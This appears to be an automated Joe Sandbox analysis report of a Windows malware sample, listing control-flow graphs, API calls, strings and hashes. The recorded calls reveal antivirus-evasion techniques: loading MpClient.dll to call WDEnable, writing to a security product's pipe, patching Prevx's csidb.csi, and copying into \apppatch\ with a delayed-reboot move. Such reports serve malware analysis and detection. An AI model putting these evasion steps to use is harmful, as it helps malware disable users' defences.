                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 153 401150-401160 154 401166-401182 CreateFileA 153->154 155 40127b-401280 153->155 154->155 156 401188-4011a1 GetFileSizeEx 154->156 157 401282-40128f IsBadWritePtr 155->157 158 40129f 155->158 161 401254-40125d 156->161 162 4011a7-4011c4 GetProcessHeap RtlAllocateHeap 156->162 159 4012a1-4012a7 157->159 160 401291-40129c 157->160 158->159 161->155 165 40125f-40126c GetHandleInformation 161->165 163 4011d5-4011da 162->163 164 4011c6-4011d2 memset 162->164 163->161 166 4011dc-401226 SetFilePointer LockFile ReadFile UnlockFile 163->166 164->163 165->155 167 40126e-401272 165->167 168 401251 166->168 169 401228-40123c GetProcessHeap HeapValidate 166->169 167->155 170 401274-401275 FindCloseChangeNotification 167->170 168->161 171 40124a 169->171 172 40123e-401244 GetProcessHeap HeapFree 169->172 170->155 171->168 172->171
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                              • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                              • String ID: G,@
                                                                                                                                                                                                              • API String ID: 213124939-3313068137

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 274 4020e0-40213c memset SHGetFolderPathA 275 4021a7-4021a9 274->275 276 40213e-40215f PathAppendA SetCurrentDirectoryA 274->276 278 4021b2-4021c2 275->278 279 4021ab-4021ac FreeLibrary 275->279 276->275 277 402161-402173 LoadLibraryA 276->277 277->275 280 402175-402183 GetProcAddress 277->280 279->278 280->275 281 402185-402192 280->281 281->275
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 00402157
                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(MpClient.dll), ref: 00402166
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 004021AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                              • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                              • API String ID: 1010965793-1794910726

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 283 401b20-401b35 284 401bd7-401bdd 283->284 285 401b3b-401b48 call 401150 283->285 285->284 288 401b4e-401b59 RtlImageNtHeader 285->288 289 401bb5-401bc9 GetProcessHeap HeapValidate 288->289 290 401b5b-401b7c GetTickCount GetModuleHandleA 288->290 289->284 293 401bcb-401bd1 GetProcessHeap HeapFree 289->293 291 401b95-401bb0 call 401000 290->291 292 401b7e-401b8c GetProcAddress 290->292 291->289 292->291 294 401b8e 292->294 293->284 294->291
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 3168189189-905597979

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 296 402680-4026ac CoInitializeEx 297 4026ae-4026b1 296->297 298 4026bf-4026e7 GetModuleFileNameW SysAllocString 296->298 297->298 299 4026b3-4026b9 297->299 300 402869-40286f 298->300 301 4026ed-4026f8 SysAllocString 298->301 299->298 302 4028c4-4028c9 299->302 303 402871-402876 300->303 304 402879-40287e 300->304 305 402853-402861 SysFreeString 301->305 306 4026fe-40271f CoCreateInstance 301->306 303->304 309 402880-402885 304->309 310 402888-40288d 304->310 307 402863-402864 SysFreeString 305->307 308 402866 305->308 311 402725-40272a 306->311 312 402827-40282a 306->312 307->308 308->300 309->310 313 402897-40289c 310->313 314 40288f-402894 310->314 311->312 315 402730-402741 311->315 312->305 316 4028a6-4028ab 313->316 317 40289e-4028a3 313->317 314->313 315->305 321 402747-402758 315->321 319 4028b5-4028b7 316->319 320 4028ad-4028b2 316->320 317->316 322 4028b9-4028bc 319->322 323 4028be CoUninitialize 319->323 320->319 321->305 325 40275e-402768 321->325 322->302 322->323 323->302 326 40276d-40276f 325->326 326->305 327 402775-40277c 326->327 328 402851 327->328 329 402782-402793 327->329 328->305 329->328 331 402799-4027b1 329->331 333 4027b3-4027d3 CoCreateInstance 331->333 334 40282c-40283d 331->334 335 4027d5-4027da 333->335 336 4027dc 333->336 334->328 340 40283f-402843 334->340 335->336 337 4027de-4027e3 335->337 336->337 337->328 339 4027e5-4027f0 337->339 339->328 343 4027f2-402803 339->343 340->328 341 402845-40284e 340->341 341->328 343->328 345 402805-402814 343->345 345->328 347 402816-402825 345->347 347->328
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                              • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                              • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                              • String ID: Windows Explorer
                                                                                                                                                                                                              • API String ID: 1140695583-228612681
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                              • String ID: SeSecurityPrivilege
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                              • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                              • String ID: \\.\pipe\acsipc_server

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,7604DB30), ref: 00402AAB
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 00402AE4
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                                • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                                • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                                • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                                • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                                • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                                • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                              • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                              • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                              • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                              • String ID: %s_$.dat$IsWow64Process$Wed Jul 6 06:49:26 20111$\apppatch\$kernel32.dll$svchost.exe

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 173 4001ca-4001e3 175 4001e5-400258 173->175 176 400259 173->176 178 40025a-401011 175->178 176->178 182 401017-40101a 178->182 183 40113c-401141 178->183 182->183 184 401020-401022 182->184 184->183 185 401028-401044 CreateFileA 184->185 186 401139 185->186 187 40104a-401051 call 401e00 185->187 186->183 190 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 187->190 191 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 187->191 190->191 192 40106a-401089 GetSecurityDescriptorSacl 190->192 193 401105 191->193 194 4010f5-401103 SetEndOfFile 191->194 195 4010a0-4010a4 LocalFree 192->195 196 40108b-40109a SetNamedSecurityInfoA 192->196 197 401108-401111 193->197 194->193 194->197 195->191 196->195 198 401113-401120 GetHandleInformation 197->198 199 40112f-401136 197->199 198->199 200 401122-401126 198->200 200->199 201 401128-401129 FindCloseChangeNotification 200->201 201->199
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                                • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                                • Part of subcall function 00401E00: FindCloseChangeNotification.KERNEL32(0040104F), ref: 00401E86
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                              • SetEndOfFile.KERNEL32(00000000), ref: 004010F6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401129
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                              • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                              • API String ID: 1779852708-820036962
                                                                                                                                                                                                              • Opcode ID: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction ID: e082a392c3e1c8ea6bcbabec48e58df7c8b9917df2aee0f20a935e5e0ee169a7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81d4fb4f5fac3a8a28ffc8fda7917889cd3cc1cb556f91fb1df1ae6cc93ce86d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4518E715093806FE7128B609D18BAA3FB99F47701F1941EBE680FA1E3D27C4D49C769

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1740350354.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1740350354.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_5AFlyarMds.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                              • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                              • API String ID: 606440919-2829233815
                                                                                                                                                                                                              • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 209 4000f1-4001e3 call 4001ca 214 4001e5-400258 209->214 215 400259 209->215 217 40025a-401011 214->217 215->217 221 401017-40101a 217->221 222 40113c-401141 217->222 221->222 223 401020-401022 221->223 223->222 224 401028-401044 CreateFileA 223->224 225 401139 224->225 226 40104a-401051 call 401e00 224->226 225->222 229 401053-401068 ConvertStringSecurityDescriptorToSecurityDescriptorW 226->229 230 4010aa-4010f3 SetFilePointer LockFile WriteFile UnlockFile 226->230 229->230 231 40106a-401089 GetSecurityDescriptorSacl 229->231 232 401105 230->232 233 4010f5-401103 SetEndOfFile 230->233 234 4010a0-4010a4 LocalFree 231->234 235 40108b-40109a SetNamedSecurityInfoA 231->235 236 401108-401111 232->236 233->232 233->236 234->230 235->234 237 401113-401120 GetHandleInformation 236->237 238 40112f-401136 236->238 237->238 239 401122-401126 237->239 239->238 240 401128-401129 FindCloseChangeNotification 239->240 240->238
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                                • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                                • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                                • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
